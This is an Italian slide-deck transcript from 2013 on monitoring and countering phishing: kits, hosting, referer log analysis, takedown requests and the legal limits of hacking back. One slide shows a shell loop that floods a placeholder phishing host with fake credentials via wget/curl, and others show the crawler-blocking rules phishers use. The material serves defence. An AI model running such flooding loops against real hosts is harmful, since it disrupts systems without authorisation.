Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità

Phishing:

monitoraggio e contrasto.

I possibili approcci e le reali possibilitA'

Torino 30 maggio 2013

Denis Frati

Denis Frati D3Lab–Www.d3lab.net

Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 1

Il phishing non e' la truffa degli sciocchi!!

Frode utenti Telepass 21-6-2012: 50 cc validi luhn

Frode utenti Poste Pay 14-11-2012: 17 cc validi luhn

Frode utenti PayPal 15-11-2012: 5 cc validi luhn

Frode Agip/Eni 19-11-2012: 17 cc validi luhn

Frode utenti Visa 20-11-2012: 23 cc validi luhn

ecc... ecc... ecc...




Il phishing non e' solo bancario 1–(social network)




Il phishing non e' solo bancario 2–(e-mail account)




Il phishing non e' solo bancario 2–(On-line game)




… Se ne frega dell'otp




… Perche' gli bastano le carte di credito - 1




… Perche' gli bastano le carte di credito - 2




… o l'accesso agli account in cui reperirle



Generalita'

Il Phishing è:

● di semplice attuazione;● poco dispendioso;● trans-frontaliero;● a basso rischio;

si avvantaggia di:

● ampio bacino vittime;● innumerevoli target;● pericolosità sottostimata;



Di cosa necessita' il phisher ? - 1 - Il kit -

Kit di phishing:l'insieme di pagine html/htm, php ed immagini, riproducenti quelle dell'ente target.

<--- li fanno e li vendono



Liste di indirizzi email a cui inviare le mail fraudolente.

Sistema invio mail:

● mail sender php;● server di posta violati;● macchine compromesse;● connessioni wireless

aperta;

Di cosa necessita' il phisher ? - 2 - liste di indirizzi mail & mail server -



Di cosa necessita' il phisher ? - 3 - SPAZIO di hosting -

Spazio di hosting:

● gratuito;● a pagamento;● sito violato;● sulla propria macchina +

dns dinamico;



1

23

4

5

66

FUNZIOnamento base



Previsioni, preveggenza, vaticinio ???



monitoraggio

Undergorund & cyber crime intelligence

False pagine web on-line

Attack spread

Provenienza

Profili utente



MonitoraggioUndergorund & cyber crime intelligence

Tra il dire ed il fare …

sono necessari:

● struttura;● risorse umane;● tempo● conoscenza degli “ambienti”● storico: profili, attività, partecipazioni, conoscenze● referenze;● ecc;

… non basta iscriversi ad un forum/blog underground, frequentare saltuariamente un canale irc su un server .ru



MonitoraggioPresenza false pagine web on-line

● il phishing è dinamico, veloce!● raramente sono presenti collegamenti a

pagine web indicizzate;● l'indicizzazione è spesso successiva alle prime

segnalazioni di frode;● il phisher conosce benissimo e usa:

➔ robot.txt;➔ htaccess;

User-agent: *Disallow: /folder1/

User-Agent: GooglebotDisallow: /folder2/

RewriteEngine On ...RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] RewriteCond %{HTTP_USER_AGENT} ^Googlebot RewriteRule ^.* - [F,L]



MonitoraggioATTACK spread

● falsificazione degli header della mail

● invio massiccio di mail anche a indirizzi inesistenti

sono necessari:● monitoraggio data-base on line;● mail box civetta;● segnalatori (spesso i clienti verso filiali);

Return-Path: <[email protected]>Notifica mancati recapiti ->WARNING

un diluvio di notifiche che può anche metterein crisi il web server

… buongiorno ho visto la mail per il concorso, quello del bonus per la ricarica

… scusi mi avete scritto per un mio conto ...ma io non sono vostro cliente ….

Scusi?? mi spieghi bene, … …mi inoltri la mail,

…può inviarmi il sorgente della mail?

addestrare il personalea ricevere le segnalazioni



MonitoraggioMonitorare la provenienza - 1

188.216.109.13 - - [25/May/2013:17:30:46 -0700] "GET /area_personale/login.php HTTP/1.1" 200 6820 "http://mycompany.victimsite.com.vn/area_personale/login.php" "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]"

Source Ip address: 188.216.109.13Data: [25/May/2013:17:30:46 -0700]Risorsa richiesta: "GET /area_personale/login.php HTTP/1.1"Risposta server: 200 6820Referer: "http://mycompany.victimsite.com.vn/area_personale/login.php"User Agent: "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]"from http://httpd.apache.org/docs/2.2/logs.html

la vittima viene rimandata a specifiche pagine legittime;noti i referer legittimi evidenzio richieste con referer non trusted (no IT, no *.mycompany.com, ecc..)

http://mycompany.victimsite.com.vn/area_personale/login.php

http://httpd.apache.org/docs/2.2/logs.html



Dal Monitoraggio al contrastoAttraverso Monitoraggio provenienza

referer pericolososu pagina login

rilevo IP possibilevittima

1- test security company, curiosi, casuale, ecc2- cliente che non prosegue con login

Yfatto login ?

N

identificocliente

azioni di verifica diretta

confronto profilo cliente

ulteriori verifiche

Evento >> log.db

Frode ?

N

Y

blocco accountblocco operatività



contrastoRichieste shutdown

Eliminare le pagine web fraudolente è imperativo, ma … … realisticamente i mezzi sono pochi!

Si inoltrano le richieste a:● gestori siti web;● gestori server;● hoster;● fornitori connettività;

Tuttavia permangono problemi dovuti a:● orari, fusi orari e festività;● difficoltà contatto;● servizi whois privacy;● incomprensioni linguistiche;● diffidenza;



Contrasto - Richieste shutdown PLAYNG WITH –redirect



Contrasto - Richieste shutdownPLAYNG WITH DYNAMIC DNS & fake sub domain

I servizi di DNS dinamico permettono al criminale di:● creare domini con nomi ingannevoli;● mantenere le strutture/pagine web al

sicuro su proprie macchine connesse in rete via SIM card

● celare la reale posizione delle pagine

- É necessario tracciare gli indirizzi IP correlati ai domini- intervenire • con corretti titolari degli IP• Fornitori servizio Dyn DNS

Il criminale:● aggredisce il sito A;● accede al pannello digestione

domini/DNS● imposta subdomini con wild card;● aggredisce il sito B● inocula le pagine fraudolente● dirotta su di esse i subdomini di A

www.post4.it.sitobucato.com

È necessario intervenire con tutte le parti:● gestori dei siti A & B● hoster dei siti A & B● fornitori connettività A & B;



contrastoCredentials bombing

Le credenziali rubate vengono:● spedite via mail al criminale;● scritte su file di testo (locali o remoti);● scritte in db remoti;

Ehi Cattivo?!?! Vuoi le credenziali ???Eccole!!

A=1while [ $A -eq 1 ]do

wget/curl http://attacksite.com/login.php?user&pass&pindone

http://attacksite.com/login.php?user&pass&pin



contrastoCredentials search

Se le credenziali sono scritte su file possonoessere individuate !!

Però lo sanno anche loro ele scrivono in /tmp che

leggono via shell remote



contrastokit search

L'individuazione del kit mi consente di● Sapere dove (presumibilmente) finiscono

le credenziali;● Profilare il possibile utilizzatore o autore

del kit;● Conoscere la propria pagina da

monitorare nei log http per i referer non trusted;

● Conoscere le proprie risorse (immagini, applet flash, css, ecc...) usate dei criminali per bloccarle;



contrastoI WANT TO BE BAD! - 1

Hai trovato una shell remota!!!Grida di giubilio!!Puoi entrare e sderenarli!!




Ricorda:vuoi utilizzare exploit e shell remote come il phisher per contrastarlo?

Commetti almeno un reatoArt. 615 ter. C.p.(accesso abusivo a sistem informatico)

se non dueArt. 617 quinquies. C.p. (danneggiamento sistema informatico).

E le responsabilità aziendali ?!?!

Inoltre: le info eventualmente raccolte non sono “forensicaly sound” perché acquisiste in modo illecito!




Ricorda:puoi accedere (illecitamente) allo spazio usato dal criminale,cancellare i suoi file, le pagine web fraudolente, ma …

… se la vulnerabilità che ha permesso l'accesso al criminale permane..NON HAI RISOLTO MOLTO.

È probabile un successivo riutilizzo a fini fraudolenti del sito /server perché la porta è ancora aperta!



Monitoraggio & Analisi a tutto campoBasi del contrasto

Un monitoraggio ampio e continuo permette:● Rilevare cambi di modalità operativa;● Individuare nuove piattaforme bersaglio

per inoculazione;● Conoscere nomi dei file di credenziali e

delle shell remote;● Individuare i kit;● Riconoscere la “firma” degli autori e

profilarli;● Individuare nell'analisi attacchi a non

clienti tracce di attacco a clienti;● Ipotizzare possibili futuri enti bersaglio.



Previsioni, preveggenza, vaticinio ???

Il monitoraggio a largo raggio fornisce indicazioni sugli orientamenti dei phisher:

es. agosto 2012 rilavati attacchi a EDF (fornitore energia francese)Fine 2012 attacchi a Gruppo, Agip/Eni

es. agosto 2012 attacchi BNP-PARIBAS (DE)Autunno 2012 attacchi BNP-PARIBAS (IT)Maggio 2013 attacchi BNP-PARIBAS (ES)

es:fine 2012 attacchi Deteuche Bank IT1° quadr. 2013 attacchi Deteuche Bank (DE)

Phishing forecast: chi verrà attaccato nei prossimi giorni?www.denisfrati.it/s?forecast :O ← analisi log http siti dei phisher

http://www.denisfrati.it/s?forecast



contrastoformazione

La (in)formazione del cliente può avere un buon ritorno di immagine, a costi contenuti.Gli avvisi sulle pagine web non li legge nessuno,ancor meno i deplian.

La formazione degli utenti interni, dei dipendenti, porta solo sicurezza.

Kevin Mitnick parlava di formazione aziendale a contrasto dall'ingegneria sociale già nel 2002 (l'arte dell'inganno).

domande



Contatti:



d3lab ~ $ whois denisfrati

Registrant Info:

Registrant: denis fratiMail address: [email protected] Company: D3LabAddress: Ivrea (TO) – V. Jervis, 4Phone: +39-0125-1963370Fax: +39-0125-1963371Compeny web site: www.d3lab.netPersonal web site: www.denisfrati.it

Expires on..............: never Last modified on........: 2012-02-20

Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità

Technology

Transcript of Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità